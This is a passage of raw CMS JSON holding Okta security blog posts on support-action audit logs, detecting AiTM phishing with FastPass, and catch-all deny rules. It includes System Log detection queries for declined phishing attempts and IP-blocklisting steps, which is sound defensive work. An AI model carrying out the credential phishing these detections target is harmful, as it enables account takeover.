published.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-07-11T02:05:27.288Z","secAuthor":[{"id":"40144a58-c93f-5b84-895a-5658f212b168","bio":{"bio":"The Defensive Cyber Operations (DCO) team is responsible for detecting and responding to cyber threats that impact Okta or our customers via the Okta platform. Our intelligence-driven capability identifies the adversaries most likely to impact Okta and our customers, and prioritises our defensive capabilities based on the threats most likely to be realised.
"},"image":null,"name":"Defensive Cyber Operations","jobTitle":"","slug":"defensive-cyber-operations","node_locale":"en"}]},{"slug":"/supportactions","id":"1cd8ab4a-357b-55c6-8ff9-846d1fa4e904","title":"System Log: a Window into Supporting the Okta Cloud","date":"2022-10-18T01:54:50+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Transparency is a core value at Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In April 2022, Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/04/okta-concludes-its-investigation-into-the-january-2022-compromise/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"committed to a range of initiatives\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that aim to drive greater transparency in how we respond to security incidents.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of those commitments was to provide our customers with insights into all the things our customer support teams do behind the scenes to deliver the unrivaled experience that is the Okta Identity Cloud.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Under 2.6 in our Security Action Plan:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“Okta will enhance the Okta System Log so that every customer support activity - even simply viewing configurations - is visible to customers in the log. We will ensure the log includes the user id of the support person performing any actions including but not limited to viewing data and performing impersonation.”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This was about seizing the opportunity to advance the transparency of cloud operations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With this change, our customers will not only have an audit log of any configuration activity they perform in their Admin Console, but also an audit log of activities Okta staff perform in our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"internal\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" customer support tool, if and when those tasks are relevant to any given customer.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If Okta customer support \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"so much as views\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" a page relevant to a customer’s configuration, it is logged for the customer.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As of August 1, 2022, two new events started appearing in customer-facing logs:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"hr\",\"data\":{},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"support.org.update\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has updated the configuration or data within the Org. These actions are typically taken in response to a customer request, such as a request to enable an Early Access feature.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"support.org.view\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has viewed a page which contains customer data. These actions are typically taken in response to a customer request, such as in the process of investigating an issue raised through a support case.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"hr\",\"data\":{},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These events include descriptive details about what action was performed, and also why it was performed (included in the supportAction object within the debugContext.debugData object).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Reports/syslog-filters.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"browse, search or filter\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on these events in the Okta Admin Console. They can also be queried and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/#filtering-results\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"filtered\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" programmatically via the System Log API, and can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Exporting-Okta-Log-Data?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"exported\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"streamed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to third-party security monitoring tools.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the benefits of moving to a cloud service is the ability to hand off many such support tasks. This frees up your employees to perform higher value-add tasks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, the traditional opacity of Cloud Service Providers had made it difficult for organizations to quantify the value and time saved. By offering visibility into the actions performed by Okta’s support agents, these events also offer Okta customers a unique insight into the work it takes to deliver our service. Sometimes the cloud feels like “magic”, but the magic of the experience is as much about the hard work of Oktanauts behind the scenes.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s System Log contains over 700 other events that provide transparency into the actions that are occurring within your Org*, and we continue to add visibility to our customers at no additional charge. You can learn more about Okta’s System Log events in our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"help center\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We hope that this commitment to transparency sets a new benchmark for all SaaS (software-as-a-service) providers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An Okta ‘Org’ is synonymous with a tenant - a single customer often has multiple test and production orgs.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-07-11T02:00:59.589Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies.
\n\nPrior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs.
\n\nBradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/fastpassphishingdetection","id":"a90b27d6-4f31-5f6b-9529-9abafe43da6e","title":"Detecting Real-Time Phishing Attacks","date":"2022-11-09T23:13:28+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the last two installments in our series on phishing resistance, we discussed \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"phishing resistant authenticators\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/10/human-factor-phishing-resistance\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"how to gather signals\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" about phishing lures directly from your users. Now let’s drill down into detection and response: what signals does Okta’s System Log provide that are indicative of in-flight phishing campaigns?\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Defensive Cyber Operations team routinely identifies phishing infrastructure configured to imitate an Okta sign-in page and proactively notify Okta customers when suspicious infrastructure we detect appears to be targeting their users. Since March 2020, we have delivered over 1000 notifications to customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Proactive alerts provides customers opportunities to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny outbound requests to phishing infrastructure from managed devices,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Request takedowns when the infringing site goes live, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Adjust access policies accordingly.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are no guarantees, however, that every phishing domain will be detected in advance of a campaign. And even when they are, there is often a short window of exposure before takedowns take effect.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So the harder problem for defenders is how to quickly identify threat actor activity and remediate any exposure while users are under attack.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FastPass is your secret weapon\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s passwordless solution, FastPass, offers \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-authenticators.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"strong resistance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" against real-time phishing attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When your users are enrolled in FastPass, Okta can provide defenders a high-fidelity signal for when user applications are being targeted by attackers wielding \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/sessioncookietheft\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"real-time (AiTM) proxies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"3Jax6edkT1fL631nUjrNuZ\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This Early Access feature is available for self-service on Okta Identity Engine - select \\\"Phishing Resistance for FastPass\\\" under \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Settings > Features\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" in the Admin Console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If one or more users enrolled in FastPass is targeted using AiTM phishing kits, Okta Identity Engine identifies the failed origin check and generates a unique event in Okta System Log:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND outcome.result eq \\\"FAILURE\\\" AND outcome.reason eq \\\"FastPass declined phishing attempt\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The utility of that single system log event can’t be understated. In many scenarios, it’s likely to be the earliest available signal about an in-flight attack, and includes key details about the phishing infrastructure used by the adversary.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Why are those details so important? As we \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"previously discussed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in this series, there are relatively few organizations today that are 100% passwordless. Even in organizations where a majority of users are protected by phishing resistant factors, there are often groups of users with little choice but to rely on authenticators that are less resistant to phishing.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In our experience, opportunistic threat actors can’t or don’t discern between what authenticators are available to any given user. They rely on harvesting or enumerating large numbers of usernames from public sources during the reconnaissance phase of an attack. If an adversary sends a phishing email to ~100 users, their lures are likely to reach targets enrolled in a broad variety of factors.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So any early detection offers opportunities to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prevent other users from accessing (or authenticating via) the attacker’s infrastructure,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Evaluate if other users were previously targeted via the same infrastructure,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Evaluate if other users have entered credentials, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Evaluate if any of the phishing activity resulted in an account takeover.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Many of these actions can be automated using Okta Workflows (or using a third-party SOAR solution).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Workflows can be used, for example, to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Extract the IP of the attacker’s proxy server.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assess the reputation of the IP (by checking the ratio of successful to unsuccessful authentication events from that IP over the weeks or months prior to the incident).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/searchsystemlogs.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Search System Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to check whether any other users successfully authenticated via a suspicious IP. If any value is returned, the flow can automatically \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/users/#clear-current-user-sessions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"clear the user’s sessions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If users entered a password as part of the authentication flow (irrespective of whether they successfully authenticated), the flow can call System Log to check whether the user’s corporate email application was accessed during the session in question. This can help determine whether to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/resetpassword.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"reset the user’s password\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Raise a request to add the IP to an org-wide blocklist (network zone) to prevent future authentication requests via the attacker’s infrastructure.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To see these ideas in action, we recommend catching up on the recorded sessions delivered on FastPass phishing resistance at this week's Oktane22 conference [Registration Required]:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane22/online-register/?utm_source=send&utm_medium=email&utm_campaign=2022_11_EV_OKT_Oktane22Online&utm_id=aNK4z000000Cc9PGAS\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Deep Dive: Preventing Credential Phishing Attacks with Passwordless and Phishing Resistant Authenticators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane22/online-register/?utm_source=send&utm_medium=email&utm_campaign=2022_11_EV_OKT_Oktane22Online&utm_id=aNK4z000000Cc9PGAS\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Deep Dive: Achieving Frictionless and Enhanced Credential Phishing Resistance with Okta FastPass\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Changelog\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.1 - May 26, 2024\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated detection query to include the missing outcome required in the outcome.result field.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.0 - Nov 20, 2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Original Version Published\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-07-11T01:55:30.200Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"},{"id":"40144a58-c93f-5b84-895a-5658f212b168","bio":{"bio":"The Defensive Cyber Operations (DCO) team is responsible for detecting and responding to cyber threats that impact Okta or our customers via the Okta platform. Our intelligence-driven capability identifies the adversaries most likely to impact Okta and our customers, and prioritises our defensive capabilities based on the threats most likely to be realised.
"},"image":null,"name":"Defensive Cyber Operations","jobTitle":"","slug":"defensive-cyber-operations","node_locale":"en"}]},{"slug":"/catchallsandcanaryrules","id":"601d2715-c6e5-56f7-82a4-c1d77f46c0d4","title":"Catch-All's and Canary Rules","date":"2023-02-23T02:56:02+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine offers admins the ability to vary authentication flows to applications based on everything from group membership, device management, device posture, network zones, risk evaluation, user behaviour and more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Generally speaking, the more context evaluated at the point of access, the better the security outcome. That’s what this whole zero trust journey is about: all the stars should align before a legitimate user can access a sensitive resource.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The flip-side of this is that it can be tempting to write a large number of distinct rules. It’s for this reason Okta recommends grouping apps and other resources by authentication assurance level (AAL): applying the most stringent set of rules to all apps designated as AAL3, another ruleset for all AAL2 apps, another for AAL1 etc. These \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63-3.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"standards exist\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to dramatically simplify life as an admin.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But if your rules do wind up being - well, unruly - there is always the possibility of an unexpected access scenario that didn’t present itself during testing. In Okta Identity Engine, rules are evaluated according to priority. During sign-on, the rule at the top of your list is evaluated first, and if the request doesn’t meet that rule, the next rule in line is evaluated, and so forth.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If an access request doesn’t meet any of the rules, it usually falls to the Default “Catch-All” rule. The Default Catch-All rule in most scenarios will allow access if primary authentication (such as a password or access to an email inbox) is satisfied. This is the default setting to avoid locking legitimate admins/users out while the org is being configured.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But once you’re up and running, you should think about a “deny by default” approach.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny by Default\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A well-established production workforce org should configure the catch-all rule (or create a new catch-all rule, if necessary*), that explicitly \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"denies access\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4rr05Dceaj3Odj4Pq9QRaL\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"That’s it. No other conditions. If a legitimate user falls through the cracks of the expected authentication context, that’s where they should land.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given the potential disruption this might cause to users, it’s prudent to write a report, detection or workflow that notifies admins of the catch-all being triggered.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You first need a query that identifies Policy Evaluation events that resulted in “DENY”, with the ID or DisplayName of your Catch-All Deny rule as a target. In my test org, the query would be:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"policy.evaluate_sign_on\\\" and outcome.result eq \\\"DENY\\\" and target.displayName eq \\\"Catch-All Deny\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For what it's worth, I used an Advanced Filter in System Log to create this query. Once I validated it was matching on my test events, I saved it as a permanent report under \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Reports\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" in the Okta Admin console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5z31sSNegtuoXPWqZ4POd8\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ideally, you want to be notified when a request matches this rule. Unfortunately, there isn’t a Okta Card in Workflows or Event Hook built to trigger a Workflow every time a specific policy is evaluated (there isn’t a pre-built Okta card or 